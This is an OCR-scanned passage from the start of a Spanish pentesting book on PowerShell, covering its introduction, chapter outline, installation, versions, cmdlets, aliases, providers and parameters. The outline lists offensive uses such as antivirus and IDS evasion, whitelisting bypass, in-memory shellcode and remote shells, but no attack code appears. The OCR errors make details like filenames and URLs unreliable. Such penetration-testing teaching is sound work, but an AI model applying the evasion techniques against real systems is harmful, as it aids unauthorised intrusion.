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Introduction 


Powershell  ha  aumentado  cxponencialmente  su  uso  en  los  test  de  intrusion  del  sector  profesional 
de  la  Seguridad  de  la  Informacion.  El  motivo  por  el  que  Powershell  es  mas  utilizado  cn  los  test  de 
intrusion  es  debido  a  todo  el  potencial  quc  la  linea  de  comandos  ofrece,  sobre  todo.  en  la  etapa  de 
post-explotacion . 

Diversas  charlas  de  muchos  investigadores  alrededor  del  mundo  explican  las  ventajas  que  la  linea  de 
comandos  de  Microsoft  aporta.  En  muchas  ocasiones,  un  auditor  puede  encontrarse  con  mecanismos 
que  eviten  que  se  pueda  lanzar  herramientas  de  auditoria  sobre  cicrtos  equipos  de  una  red.  La 
posibilidad  de  ejecutar  ciertas  herramientas  o  scripts  directamente  en  memoria.  hacen  de  Powershell 
una  punto  a  favor  en  la  auditoria.  Ademas.  muchos  administradores  de  sistemas  y  redes  puedcn 
evitar  la  ejecucion  de  una  cmd,  pero  por  desconocimiento  no  se  prohibe  la  ejecucibn  de  Powershell. 
aunque  claramente  esta  aporta  mucho  mas  potencial  que  la  cmd clasica  de  Microsoft. 

Powershell  puede  utilizarse  tambien  en  las  fases  de  gathering  y  explotacion,  sin  estar  limitado  a 
la  fase  de  post-explotacion ,  donde  se  saca  su  mejor  provecho.  Desde  hace  unos  afios  hay  muchos 
investigadores  que  han  ido  creando  diferentes  frameworks  de  Powershell  aportando  dilerentes 
funciones  y  herramientas  que  ayudan  a  contemplar  estas  3  etapas  de  un pentest.  Durante  el  desarrollo 
del  libro  se  ha  enfocado  siempre  a  Powershell  como  herramienta  de  auditoria  en  las  3  fases  indicadas 
anteriormente. 

En  el  primer  capitulo  se  propone  una  introduccion  y  un  uso  bdsico  de  Powershell  para  aquellos 
auditores  y pen/esters  que  no  hayan  trabajado  anteriormente  con  ella.  Microsoft  propuso  una  sintaxis 
y  un  modelo  de  alias  similar  al  de  los  sistemas  UNIX,  por  lo  que  el  paso  de  una  consola  a  otra  es 
rapido.  Hay  que  indicar  que  Powershell  es  una  consola  de  objetos  y  no  de  strings,  como  es  el  caso 
de  Bash. 

Hn  el  segundo  capitulo  sc  trata  el  tema  del  desarrollo  de  scripts  explicando  las  estructuras  basicas  y 
avanzadas  quc  pueden  scr  utilizadas  para  que  el  lector  pueda  desarrollar  sus  propios  scripts  v  exploits. 
Ademas.  el  lector  ira  guiado  con  diferentes  ejemplos  que  ayudan  y  simplifican  cl  aprendizaje  de  toda 
la  informacion. 

I  n  el  lercer  capitulo,  el  cual  ocupa  gran  parte  del  libro,  se  detallan  las  herramientas  que  existen  en 
la  actualidad  con  Powershell  para  llevar  a  cabo  auditorias.  Se  detallan  los  diferentes  frameworks 
ejcmplificando  mediante  pruebas  de  concepto  como  el  auditor  puede  aprovechar  el  maximo  de 
cstos.  El  numero  de  herramientas  es  alto  y  se  pueden  ver  diferentes  funciones  fundamentales  en 
una  auditoria,  todas  el  las  ejecutadas  desde  Powershell.  Ejecutar  un  mimikatz  creado  en  Powershell , 
disponer  de  una  navaja  suiza  con  Powercat,  ejecutar  una  shellcode  en  memoria.  hypassear 
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mecanismos  de  seguridad  como  antivirus,  crear  ficheros  maliciosos  para  alaques  client-side,  reflejar 
una  Power  shell  interactiva  en  remoto  para  su  control,  realizar  escaneos  de  puertos  de  redes  sin 
necesidad  de  disponer  de  mnap,  etcetera. 

En  el  cuarto  capituio  se  presentan  difcrentes  herramientas  que  hacen  uso  de  Powershell  para  mejorar 
el  pentest.  Se  detallara  como  Metasploit  dispone  de  un  payload  interactive  que  ofrece  la  linea  de 
comandos,  como  existe  un  conjunto  de  scripts  que  interaccionan  con  Metasploit ,  como  con  SET, 
Social  Engineering  Toolkit ,  se  proporciona  codigo  de  Powershell  que  puede  otorgar  el  control 
remoto  de  una  maquina  con  acceso  fisico,  o  como  existen  herramientas  en  Python  que  ayudan  a 
tomar  el  control  de  maquinas  a  trav^s  de  Powershell. 

En  definitiva,  el  libro  presenta  al  pentester  que  la  fase  de  pos t-expl otacidn  tiene  una  nueva  vision 
gracias  a  la  consola  de  Microsoft ,  la  cual  tiene  acceso  a  todo  el  sistema  operativo  de  manera  sencilla 
y  a  los  productos  de  la  empresa  de  Redmond.  Ademas,  no  hay  que  olvidar  que  la  fase  de  gathering 
y  explotacion  tambien  esta  contemplada  hoy  en  dia  con  Powershell. 


Capituio  I.  Conceptos  basicos  de  PowerSheU 
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Capituio  I 

A 

Conceptos  basicos  de  PowerShell 


l.^Que  es  y  que  engloba  a  PowerSheU? 

Mace  uiios  ahos  Microsoft  aposto  por  un  cambio  en  lo  que  a  h'neas  de  comando  se  refiere.  Con 
este  cambio  llego  PowerSheU,  la  cual  es  la  linea  de  comandos  basada  en  .NET  Framework .  muy 
flexible  y  con  gran  potencia.  Gracias  a  esta  linea  de  comandos  el  usuario  puede  administrar  los 
sistemas,  tanto  locales  como  remotos,  y  puede  automatizar  las  tareas  mediante  el  desarrollo  de 
scripts ,  gestionando  los  diferentes  productos  de  la  empresa  de  Redmond. 


|  Windows  PowerSheU 

#  * 

m  * 

♦  9 

l  = ; 

r 

Windows  PowerSheU 
Copyright  <C>  2009 

Microsoft 

Corporat ion . 

Reservados 

todos 

los  derechos. 

J  > 

PS  C:\Users\bit >  _ 

|7  | 

IM 

> 

_ 

-A 

Fig.  1.01:  Linea  de  comandos  de  PowerSheU. 


Pow  erSheU  amplia  de  largo  las  capacidades  de  interaccion  de  la  and  clasica  de  Windows  y  dispone 
de  caracteristicas  o  modulos  que  aportan  nuevas  fiincionalidades  cuando  son  cargados.  Hay  que 
entender  que  esta  poderosa  linea  de  comandos  no  es  solo  una  evolucion  de  una  ami  como  algunos 
usuarios  o  administradores  pueden  llegar  a  pensar.  es  una  de  las  herramientas  mas  poderosas  para  la 
gestibn  de  maquinas  y  dominios  Microsoft.  Esto  hace  pensar  que  llevada  al  ambito  de  una  auditoria 
de  seguridad  o  pentest  se  pueda  pensar  que  los  limites  no  existen  con  esta  herramienla. 

La  riqueza  que  ofrece  PowerSheU  reside  en  el  tratamiento  de  objetos  y  no  de  cadenas  de  texto.  como 
ocurre  por  cjemplo  en  Bash.  Este  aspecto  es  innovador.  ya  que  generalmente  este  tipo  de  lineas  de 
comandos  hacen  tratamiento  de  cadenas  de  texto.  El  manejo  de  objetos  de  PowerSheU  proviene  de  la 
herencia  que  proporciona  .NET  Framework.  Este framework  es  muy  conocido  por  los  desarrolladores 
de  aplicaciones  pero  no  es  muy  trabajado  por  los  administradores  u  otros  profesionales  Tl. 
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2.  Instalacion  de  una  PowerShell 

PowerShell  puede  ser  instalada  mediante  ejecutable  descargado  desde  el  sitio  web  oficial  de 
Microsoft.  Hay  que  tener  en  cuenta  que  desde  la  version  de  Windows  7  o  Windows  Server  2008  R2 
viene  por  defeeto  instalada.  Por  supuesto  en  versiones  posteriores,  como  Windows  8.  Windows  8.1  o 
Windows  Sewer  2012  tambien. 


Los  requisitos 

FI  requisito  de  PowerShell  es  .NET  Framework.  Esta  linea  de  comandos  esta  basada  en  .NET 
Framework  por  lo  que  la  instalacion  depende  totalmente  de  tener  este  framework  instalado  en  la 
maquina. 

La  version  miniina  requerida  de  .NET  Framework  es  la  2.0,  pero  se  pucde  disponer  ademas  de 
versiones  superiores.  En  los  sistemas  operativos  Windows  7  y  Windows  Server  2008  R2  el  framework 
viene  integrado  en  su  version  2.0, 3.0  y  3.5,  al  igual  que  viene  integrado  la  version  2.0  de  PowerShell. 
La  version  1 .0  de  PowerShell  no  es  compatible  con  Windows  7  y  Windows  2008  R2. 

Windows  Vista  y  Windows  Server  2008  R2  integran  tanto  .NET  Framework  2.0  como  el  3.0,  siendo 
opcional  su  instalacion  la  version  3.5.  Para  instalar  PowerShell  1.0  sobre  Windows  Vista  se  necesita 
descargar  su  ejecutable  e  instalarlo.  El  nombre  de  los  ejecutables  son  Windows6.0-  KB928439-  x86. 
msu  y  Windows6.0-  KB928439- x64.msu.  en  funcion  de  si  es  para  32  o  64  bit.  Para  la  instalacion  de 
la  version  1.0  sobre  Windows  Server  2008  no  se  necesita  descargar  ya  que  viene  integrado  pero  no 
activado,  se  debe  activar  como  componente  adicional. 

Para  instalar  PowerShell  2.0  sobre  Vista  y  2008  se  necesita  descargar  adicionalmente  el  ejecutable 
desde  la  pagina  web  de  Microsoft.  Hay  que  recalcar  que  en  Vista  se  necesita  SP1.  El  nombre  de  los 
ejecutables  son  Windows6.0-  KB968930-.\86.msit  y  Windows6.0-  KB968930-.x64.msu. 

En  Windows  Server  2 003/R2  se  necesita  instalar  manualmente  .NET  Framework  2.0  y  opcionalmente 
la  version  3.0  y  j.5.  Para  instalar  PowerShell  1.0  sobre  Windows  Server  2003  se  necesita  descargar 
el  ejecutable  Windows  Server 2 003-  KB 92614 0-  v5-.x8  6-  ES.exe  desde  la  pagina  web  de  Microsoft. 
Ademas  se  requiere  que  esta  version  del  servidor  disponga  del  service  pack  SPI  como  mfnimo. 
Por  otro  lado  en  Windows  Server  2003  R2  solo  hay  que  obtener  el  ejecutable  WindowsServer2003. 
WindowsXP -  KB926l39-v2  -x64-ENU.exe  y  realizar  su  instalacion. 

Para  instalar  PowerShell  2.0  sobre  Windows  Server 2003  se  requiere  que  el  SP2  se  encuentrc  instalado 
sobre  el  sistema  operative  y  la  descarga  del  ejecutable  WindowsServer2003-  KB968930-x86-  ES.exe 
o  WindowsSetyer2 003-  KB968930-x64-  ES.exe.  Los  mismos  requisitos  son  los  necesarios  para 
Windows  Server  2003  R2. 

En  Windows  XP  se  requiere  la  instalacion  de  .NET  Framework  2.0  y  opcionalmente  las  versiones 
superiores  3.0  y  3.5.  Para  la  instalacion  de  PowerShell  1.0  se  requiere  la  descarga  del  ejecutable 
WindowsXP-  KB926140-  v5-x86-  ES.exe  y  disponer  del  SP2  instalado  como  minimo.  Para  la 
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instalacion  de  PowerShell  2.0  se  requiere  la  descarga  del  ejecutable  WindowsXP-  KB968930-  x86 
ES.exe  y  el  sendee  pack  SP3  de  Windows  XP. 

Las  siguientes  URL  son  para  las  descargas  de  PowerShell  desde  el  sitio  web  de  Microsoft : 

-  PowerShell  1.0  en  Windows  Vista,  http://support.microsoft.com/kb/928439/es. 

-  PowerShell  2.0  en  Windows  Vista  y  Windows  Server  2008.  http://supporf.microsoft.com/ 
kb/968929/es. 

-  PowerShell  1.0  en  Windows  AT  y  Windows  Sender  2003 ,  http://support.microsqft.com/ 
kb/926 140/es. 

-  PowerShell  2.0  en  Windows  XP  y  Windows  Server  2003.  http://suppori.microsoft.com/ 
kb/968929/es. 

Cuando  se  descarga  desde  el  sitio  web  de  Microsoft  alguna  version  dc  PowerShell  se  debe  elegir 
entre  un  paquete  de  instalacion  Iocalizado  o  en  ingles.  Un  paquete  de  instalacidn  localizado  es  una 
instalacion  de  PowerShell  para  sistemas  operativos  Windows  en  aleman,  espanol,  Frances,  italiano, 
japones,  coreano,  portugucs,  ruso,  chino  simplificado  o  tradicionai. 

Por  otro  lado  un  paquete  de  instalacion  en  ingles  se  utlliza  para  los  sistemas  operativos  Windows  en 
ingles  o  una  version  en  un  idioma  que  no  se  encuentre  en  el  paquete  de  instalacion  localizado. 

Hay  que  recalcar  que  los  paquetes  de  idioma  MUL  (Multilingual  User  Interface),  son  necesarios  si 
se  esta  ejecutando  una  version  multilingUe  de  la  interfaz  de  usuario  de  Windows.  Para  estos  paquetes 
de  idioma.  se  debe  instalar  en  primer  lugar  la  version  de  PowerShell  y  a  continuacion  el  paquete 
MUL 


Nombre  del  archivo: 

Tama  no: 

WindowsServer2003-KB926140-v5-x86-ESN.exe 

1.7  M3 

Detalles  rapidos 

Version: 

926140 

Fecha  de  publ  cation: 

23/06/2008 

Cambiar  idioma: 

Espanol 

E 

Cambiar 

Tiempo  de  descarga  esbmado: 

Articulos  de  sopor  te 

Aleman 

Chino  (simplifies  do  j 
Chino  (tradiciona  } 

Coreano 

4  min 

KB 9 26 140 

Internet  Explorer.  Hay  una 
nueva  version  de  tu 
navegador.  Mejora  tu 
experientia  web. 

Descarga  tel  a  aqui 

Information  general 

Frances 

Ingres 

Italiano 

Japones 

Portugues  ^Brasil) 

Ruso 

Fig.  J.02:  Eleccion  de  idioma  en  ta  descarga  de  PowerShell. 
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3.  ^Como  puede  ayudar  en  un  pentest? 

Un pentester  tiene  miles  de  situaciones,  condiciones  y  ambientes  diferentes.  Por  esta  razon,  cuando 
uno  se  enfrenta  a  un  entorno  en  el  que  no  se  puede  disponer  de  ciertas  herramientas  para  la  realizacion 
del  pentest  se  debe  utilizar  el  potential  de  la  imagination  para  conseguir  los  objetivos  propuestas 
con  anterioridad. 

El  congreso  Qnrtubci  Security  Congress  de  la  ciudad  de  Cordoba  tuve  la  posibilidad  de  presentar 
una  charia  en  la  que  se  mostraba  eomo  gracias  a  herramientas  nativas  de  los  sistemas  operativos 
Microsoft  de  ultima  generacion  se  puede  cjecutar  cualquier  tipo  de  codigo.  a  traves  de  la  linea  de 
comandos  PowerShelL  De  este  modo,  no  se  echara  en  falta  la  no  posibilidad  de  ejecutar  herramientas 
clasicas  eomo  nmap ,  cain  &  abel,foca,  etcetera.  El  nombre  de  la  charia  que  presente  se  denomino 
"Give  me  a  PowerShell  and  I  will  move  your  world". 

Hay  que  analizar  algunas  charlas  que  se  han  llevado  a  cabo,  sobretodo  en  clasicas  eomo  Shmoocon  o 
Black  Hat.  para  entender  loda  la  potencia  que  PowerShell  ofrece  en  un  pentest .  Ademas,  conociendo 
algunos  metodos  para  llevar  a  cabo  un  bypass  de  las  politicas  de  ejecucion  de  codigo  de  PowerShell y 
jugando  con  los  frameworks  que  han  ido  apareeiendo,  eomo  Power Sploit,  Nishang  o  Posh-Sec  Mod. 
se  puede  montar  un  pequeho  hot  util  para  entomos  dificiles,  entomos  con  alta  monitorizacion  de 
elementos  de  seguridad  o  entornos  a  los  cuales  el  hot  pudiera  accedes  pero  no  asi  el  pentester.  Esto 
es  una  de  las  cosas  que  se  presentaba  en  el  trabajo  indicado  anteriormente  en  Qurtuba  Security 
Congress. 

^Para  que  es  muy  potente  PowerShell  en  un  pentest ?  A  continuation,  se  enumeran  las  diferentes 
acciones  que  pueden  llevarse  a  cabo  nativamente  desde  la  linea  de  comandos  de  Microsoft: 

-  Ejecucion  de  codigo. 

-  No  generacion  de  demasiado  trafico  o  este  pasa  desapercibido. 

-  Posibilidad  de  utilizacion  de  proxies. 

-  Evasion  de  elementos  de  seguridad.  eomo  puede  ser  el  antivirus,  un  IDS,  Intrusion 
Detection  System,  o  un  IPS,  Intrusion  Prevention  System. 

-  Modification  de  scripts  o  binarios. 

-  Etapa  de  descubrimiento  y  recopilacion  de  informacion  del  entorno. 

-  Encapsulation  de  trafico. 

-  Conectividad  y  pivoting. 

Escaneo  de  puertos  y  fingerprinting . 

-  Evitar  las  whitelisting  de  aplicaciones.  En  ciertos  entomos  se  puede  tener  configurado  una 
lista  blanca  de  aplicaciones  que  pueden  ser  ejecutadas.  Los  scripts  se  lanzaran  a  travds  de 
PowerShell ,  pudiendo  evitar  esta  lista  blanca. 

En  resumen,  el  pentester  puede  encontrarse  en  condiciones  y  un  entorno  dificil,  en  el  cual  no  dispone 
de  herramientas.  La  unica,  y  mas  que  suficiente,  herramienta  que  dispone  de  forma  nativa  en  los 
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equipos  a  los  que  tiene  acceso  es  PowerShell.  Con  esta  herramienta  se  podrian  hacer  muchas  cosas,  e 
interactuar  con  gran  cantidad  de  productos  de  Microsoft,  por  lo  que  el  pentest  puede  llevarse  a  cabo. 
Ademas.  gracias  a  \os  frameworks  enunciados  anteriormente,  cxiste  gran  cantidad  de  herramientas 
con  codigo  PowerShell  que  facilitan  estas  tareas. 


4.  Versiones 

Hasta  la  version  de  Windows  8.1  existen  4  versiones  liberadas  de  PowerShell.  Se  espera  que  con 
Windows  70  se  libere  la  version  5  de  PowerShell .  Para  conocer  la  version  de  PowerShell  que  ejecuta 
una  maquina  se  puede  utilizar  el  comando  Get-Host,  el  cual  proporciona  diferente  informacion  sobre 
el  entomo. 

En  muchos  libros  o  articulos  en  Internet  se  puede  leer  eomo  definen  a  PowerShell  eomo  la  nueva 
linea  de  comandos  de  Microsoft.  Este  es  un  dato  erroneo  ya  que  el  proyecto  comenzo  en  el  aiio  2003 
bajo  el  nombre  de  MONAD.  En  2006  fue  lanzada  al  publico  con  el  nombre  oficial  de  PowerShell  LO. 


PowerShell  1.0 

Lanzada  en  Abril  de  2006  para  aumentar  las  capacidades  y  las  limitaciones  del  CMD  clasico  a  la  vcz 
que  cubria  ambitos  a  los  que  la  consola  clasica  de  Mic/vsoft  no  se  acercaba. 

Una  de  las  caractcristicas  mas  interesantes  que  presento  PowerShell  fue  la  manipulacion  de  objetos 
respecto  a  otras  shell ,  las  cualcs  manipulan  cadenas  de  texto.  Esto  implica  la  posibilidad  de  disponer 
de  propiedadcs  dentro  de  los  objetos  otorgando  mayor  riqueza  semantica  al  lenguaje  de  scripting  y 
a  la  interaction  con  la  maquina. 

PowerShell  presento  129  utilidades  estandar,  tambien  conocidos  eomo  cmdlets  de  los  cuales  se 
hablara  mas  adelante.  Con  los  cmdlets  se  puede  realizar  distintas  tareas  administrativas  eomo 
gestionar  el  registro,  el  sistema  de  archivos,  monitorizar  procesos,  etcetera. 


PowerShell  2.0 

Lanzada  en  Julio  de  2009  proporciono  bastantes  cambios  y  mejoras  a  la  version  LO.  Algunas  de  las 
nuevas  caracteristicas  son  las  siguientes: 

Interaction  remota  con  uno  o  varies  equipos. 

Entorno  graft co  denominado  PowerShell  ISE.  Integrated  Scripting  Environment. 
Modulos  para  mejorar  el  desarrollo  del  codigo,  creando  unidades  independientes. 

-  Nuevos  cmdlets.  La  version  2.0  introduce  mas  de  1 00  cmdlets  integrados  nuevos  respecto 
a  la  version  1 .0. 

-  Ejecucion  en  segundo  piano  de  un  trabajo. 
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PowerShell  3.0 

Las  caracteristicas  que  marcan  esta  version  son  las  siguientes: 

-  Flujos  de  trabajo. 

-  Power  Shelf  Web  Access. 

-  Nuevas  caracteristicas  en  el  entomo  de  desarrollo  PowerShell ISE. 

-  Integracion  de  CIM. 

-  Nuevas  caracteristicas  de  Windows  PowerShell . 

-  Carga  automatica  de  modules. 

Compatibiiidad  con  RunAs  y  host  compartido. 

-  Nuevas  API  de  cmdlets . 

PowerShell  4.0 

Las  caracteristicas  que  marcan  esta  version  son  las  siguientes: 

-  Nuevas  caracteristicas  de  Windows  PowerShell . 

-  Nuevas  caracteristicas  del  entomo  de  desarrollo  y  mejoras  en  PowerShell  ISE . 

-  Mejoras  en  los  flujos  de  trabajo  introducidos  en  la  version  anterior. 

-  Nuevas  caracteristicas  de  servicios  web  en  PowerShell. 

-  Mejoras  en  PowerShell  Web  Access. 

-  Correceion  de  errores  en  versiones  anteriores. 


5.Lo  mas  basico:  Comenzando 

Ln  estc  apartado  sc  cxplican  los  conceptos  mas  importantes.  los  cuales  se  utilizaran  y  leeran  durante 
el  contenido  del  libro.  Estos  conceptos  y  defmiciones  son  los  pilares  basicos  sobre  los  que  PowerShell 
se  asienta  para  otorgar  al  pentester  todas  las  posibilidades. 

Cmdlet 

l/n  cmdlet  es  una  instancia  de  una  clase  de  .NET  Framework ,  aunque  en  este  libro  se  les  Ilame 
comandos  en  algunas  ocasiones.  Un  cmdlet  procesa  objetos  de  entrada  desde  una  canal  izacion  de 
objeto  en  vez  de  desde  una  secuencia  de  lexto.  Este  no  analiza  sus  propios  argumentos  ni  especifica 
una  presentation  de  errores.  Esto  simplifica  el  proceso  de  creation  dc  un  cmdlet. 

Estos  comandos  estan  orientados  a  realizar  una  tarea  concreta  manipulando  para  ello  objetos  de 
PowerShell.  El  disefio  de  PowerShell  hace  que  sea  sencillo  reconocer  un  cmdlet  ya  que  estos  tienen 
un  fonnato  orientado  al  lenguaje  natural. 
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Los  nombres  de  los  cmdlet  constan  de  2  partes.  <verbo>-<nombre>.  La  parte  del  verbo  indica  la 
action  que  se  va  a  realizar  con  la  ejecucion  del  cmdlet  y  la  parte  del  nombre  indica  el  recurso  sobre  cl 
que  el  cmdlet  realizara  la  accion.  Todos  los  cmdlet  disponen  de  este  sencillo  formato  mnemotecnico. 

La  ejecucion  de  un  cmdlet  no  es  case  sensitive ,  por  lo  que  es  independiente  de  si  se  escribe  en 
mayusculas  o  minusculas.  No  es  necesario  aprender  todos  los  cmdlet  que  PowerShell  contiene  ya 
que  se  dispone  de  herramientas  para  obtener  los  distintos  cmdlet. 


Alias 

Los  alias  son  mecanismos  que  facilitan  la  interaction  con  la  linea  de  comandos.  Los  alias 
proporcionan  un  metodo  para  recordar  un  cmdlet  o  expresiones  con  otro  nombre,  con  el  cual  el 
usuario  se  siente  mas  identificado.  Esta  linea  de  comandos  proporciona  por  defecto  diversos  alias, 
los  cuales  el  usuario  puede  visualizar  a  traves  del  cmdlet  Get-Alias. 


PS  C:\Users\bit>  Get-Alias 

CommandType 

Wane 

Def in  it  ion 

Alias 

V. 

ForEach-Object 

A  lias 

? 

Where -Object 

A  lias 

ac 

Add-Content 

Alias 

asnp 

Add-PSSnapIn 

A  lias 

cat 

Get-Content 

A  lias 

cd 

Set-Location 

A  lias 

chdir 

Set-Location 

A  lias 

clc 

Clear-Content 

A  lias 

clear 

Clear-Host 

Alias 

clhy 

Clear-History 

Alias 

cli 

Clear-I tern 

Alias 

clp 

Clear- I temProperty 

A  lias 

els 

Clear-Host 

A  lias 

civ 

Clear-Uariable 

Alias 

compare 

Compare -Object 

Alias 

copy 

Copy-Item 

Alias 

cp 

Copy-Item 

Alias 

cpi 

Copy-Item 

Alias 

epp 

Copy- I temProperty 

Alias 

cupa 

Convert-Path 

Alias 

dbp 

Disable-PSBreakpoint 

Alias 

de  1 

Remove-Item 

Alias 

diff 

Compare-Object 

Alias 

dir 

Get-Childl tern 

Alias 

ebp 

Enable-PSBreakpoint 

Alias 

echo 

Write-Output 

TTPtiPtI 

eoal 

Export-Alias 

Fig.  1.03:  Ejecucion  Jet  cm/det  get-alias  y  oh  tendon  de  los  alias  disponihles. 


Al  ejecutar  un  alias  en  PowerShell  se  ejecuta  un  cmdlet  o  funcion  que  se  encuentra  asociado  al  alias 
invocado.  Adcmas,  se  puede  ejecutar  el  cmdlet  Get-Alias  en  la  linea  de  comandos  para  conocer  que 
cmdlet  estan  asociados  a  los  alias. 

Muchos  usuarios  o  pen  testers  estan  acostumbrados  a  utilizar  shells  en  entomos  como  GNU/Linus. 
I  n  PowerShell.  para  lograr  una  transition  o  un  acomodamiento  a  la  sintaxis.  existen  facilidades 
ninemotecnicas  como  de  accesibilidad.  De  esta  forma  el  usuario  tendra  un  trabajo  mas  facil  en  el  uso 
de  esta  linea  de  comandos.  El  mundo  *A7A'ha  sido  ojeado  por  la  parte  de  Microsoft  para  configurar 
alias  por  defecto  cercanos  a  los  comandos  que  se  puede  encontrar  en  el  mundo  *NIX.  Con  esta 
accion  se  ha  eonseguido  que  el  paso  del  mundo  UNIX  a  PowerShell  sea  mas  sencillo. 
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Comandos  *NIX  y  CMD  en  PowerShell 

Los  usuarios  y  pentesters  que  utilizan  sistemas  UNIX que  lleguen  a  PowerShell  pueden  utilizar  los 
alias  como  estrategia  para  hacer  una  transicion  mas  sencilla. 

A  continuacion  se  muestran  diferentes  alias  utilizados  en  PowerShell  y  los  cmdlets  asociados  a 
dichos  alias. 


Alias  *NIX 

Cmdlct 

Is 

get-childitem 

cd 

set-location 

cat 

get-content 

MV 

move-item 

history 

get-history 

alias 

get-alias 

Tablet  1.0J:  Ejemplu  de  alias  UNIX  y  sit  cm  diet  equivatenfe. 


Desde  PowerShell  se  puede  lanzar  una  cmd  y  los  comandos  de  esta  tambien,  ya  que  al  final  son 
ejecutables  o  ficheros  exe  que  eran  invocados. 


Provider 

El  provider  o  proveedor  es  una  aplicacion  basada  en  .NET  Framework  la  cual  facilita  el  iratamiento 
de  los  datos.  Los  datos  seran  mostrados  en  un  almacen  para  que  puedan  ser  gestionados  de  manera 
sencilla.  El  usuario  puede  navegar  por  el  almacen  como  si  se  tratase  del  sistema  de  ficheros,  esta 
aplicacion  consigue  que  la  gestion  del  registro,  entre  otros,  sea  muy  sencilla  en  PowerShell. 

En  PowerShell  se  disponen  de  distintos  tipos  de  proveedores.  En  la  siguiente  tabla  se  pueden 
visualizar  de  proveedores  que  se  pueden  encontrar  en  PowerShell ,  y  que  pueden  ser  utiles.  Hay  que 
recordar  que  en  la  parte  de  desarrollo  de  scripts .  se  puede  necesitar  de  estos  providers  para  realizar 
acciones  lo  mas  sencillo  posible.  Ademas,  los  frameworks  que  se  estudiaran  mas  adelante  y  que 
ayudan  a  la  realizacidn  de  un  pentesting  con  PowerShell  utilizan,  entre  otras  muchas  cosas.  este  tipo 
de  aplicaciones. 


Proveedor 

Descripcion 

Comando 

Alias 

Acceso  a  los  alias  que  en  el  entomo  de 
PowerShell  y  sus  valores 

set-location  alias: 

Certificados 

Acceso  a  certificados  y  almacenes  de 
certificados  X509.  Solo  lectura 

set-location  cert: 
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Proveedor 

Descripcion 

Comando 

Entomo 

Acceso  a  las  variables  de  entomo  de 
Windows 

set-location  env: 

Sislema  de  archivos 

El  proveedor  basico.  Acceso  a  archivos  y 
directorios 

set-location  <unidad> 

Registro 

Acceso  a  las  claves  y  valores  del  registro 
de  Windows 

set-location 

•HKCU.HKLM/: 

WSMan 

Acceso  a  la  information  de  configuration 
de  WSMan 

set-location  wsman: 

Variables 

Acceso  a  las  variables  del  entomo  de 
PowerShell  y  sus  valores 

set-location  variable: 

Funciones 

Acceso  a  las  funciones  definidas  en  el 
entomo  de  PowerShell 

set-location  function: 

Tabla  1.02:  Definiciones  de  los  proveedores  porde/ecto. 


[ps  c 

:\Users\bit>  Set-Location  hkcu: 

PS  MKCU:\>  Get-Childl ten 

Hiue :  HKEV_CURRENT_USER 

SKC 

UC  Name 

Property 

2 

a 

0  AppEvents 

36  Console 

<ColorTable00,  ColorTable01 ,  ColorTable02,  ColorTable03 . . .> 

is 

0  Control  Panel 

<> 

a 

3  Environment 

<TEMP,  TMP,  MOZ_PLUGI N_PflTH> 

4 

0  EUDC 

{  ) 

1 

6  Identities 

{Identity  Ordinal,  Migrated?,  Last  Username,  Last  User  ID..„> 

3 

0  Keyboard  Layout 

O 

a 

0  Network 

<> 

4 

0  Printers 

<> 

26 

0  Software 

<> 

l 

0  System 

o 

1 

8  Uolatile  Environment 

<: LOGONS ERUER,  USERDOMAIN.  USERNAME.  USERPROPI LE.  .  .> 

|ps  HKCU  :\> 

Fig.  1.04:  Ejecucion  de  tin  proveedor  que permite  gestionar  el  registiv  en  la  ntta  HKCU. 


HI  comando  Set-Location  permite  moverse  entre  directories,  si  por  ejemplo  la  linea  de  comandos 
sc  encuentra  en  el  proveedor  del  sistema  de  archivos.  Tambien  permite  cambiar  entre  proveedores  a 
alguno  de  los  que  se  encuentran  en  la  tabla  anterior. 


Ademas,  un  usuario  puede  utilizar  los  diferentes  alias  para  este  comando,  como  son  chdir  o  cd. 


PS  C:\Users 

\bit>  Get-Alias  -Definition  set-location 

Connandlype 

Nane 

Def in  it ion 

Alias 

cd 

Set-Location 

Alias 

chdir 

Set-Locat  ion 

Alias 

si 

Set-Location 

Fig.  1.05:  Ob  tendon  de  los  alias  de  set-location. 
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Parametros 

Los  paiametros  son  modificadorcs  que  se  aiiaden  a  un  cmdlet  para  cambiar  el  modo  de  ejecucion  de 
dieho  comando.  En  otras  palabras.,  un  cmdlet  puede  realizar  distintas  subtareas  denlro  de  su  tarea 
principal  y  los  parametros  activan  dichas  subtareas.  Los  parametros  son  anadidos  despues  de  la 
llamada  al  cmdlet  y  precedidos  de  un  guion,  <cmdlet>  - parametm  l  -parametro  2  ...  -pa ram e fro 
V.  Results  muy  interesante  entender  que  los  parametros  de  PowerShell  son.  casi  en  su  total idad. 
nombres  coherentes. 


PS  C:\Users\bit>  Get -A lias  -Name  w* 

ConmandTi/pe  Nane 

Alias  where 

Alias  ujb 

Alias _ urite 


fig.  1.06:  Ejecucion  de  get-alias  con  el  parametm  name  para  elfiltrado  de  la  salida. 

Los  parametros  pueden  ser  clasificados  por  la  funcion  que  desempenan.  A  continuacion  se  muestra 
la  clasificacion: 

Parametro  de  ayuda.  Este  tipo  esta  presente  en  todos  los  cmdlets.  Para  invocarlo  se  debe 
indicar-?.  Cuando  se  realiza  esta  accion  el  cmdlet  no  se  ejecuta,  pero  PowerShell  muestra  el 
contenido  de  la  ayuda  asociado  al  comando. 

Parametros  dinamicos.  Estos  parametros  se  anadiran  a  los  cmdlets ,  a  los  propios  scripts, 
proveedores  o  funciones,  siempre  y  cuando  se  cumplan  ciertas  condiciones. 

-  Parametros  comunes.  Son  parametros  que  se  compartan  siempre  de  la  misma  manera, 
siempre  y  cuando  el  cmdlet  los  implemente.  Los  parametros  comunes  son  Whatfj,  Confirm . 
Verbose ,  Debug,  Warn,  Envr Action,  ErrorVariable,  OutVariabley  Out  Buffer. 

-  Parametros  conmutados  o  switch  parameter.  Estos  parametros  funcionan  como 
inten  uptores.  es  decir,  pueden  ir  activados  en  la  ejecucion  del  cmdlet  o  funcion  o  no  aparecer. 
Ademas.  este  tipo  de  parametros  pueden  recoger  un  argumento  o  no.  Estos  parametros  son 
muy  utilizados  en  funciones  para  poder  ejecutar  diferentes  comportamientos.  a  traves  de 
valores  booleanos. 

-  Conjuntos  de  parametros.  Este  grupo  de  parametros  son  utilizados  en  un  mismo  cmdlet 
para  llevar  a  cabo  una  accion  concreta. 


Def in  it  ion 

Where -Object 
Wait -Job 
Write -Output 


Archivos 

Los  archivos  son  algo  fundamental  para  cualquier  sistema.  ya  que  es  la  manera  mas  sencilla  de 
almacenar  los  dates  de  forma  persistentc.  Los  distintos  formatos  en  los  que  la  informacion  puede 
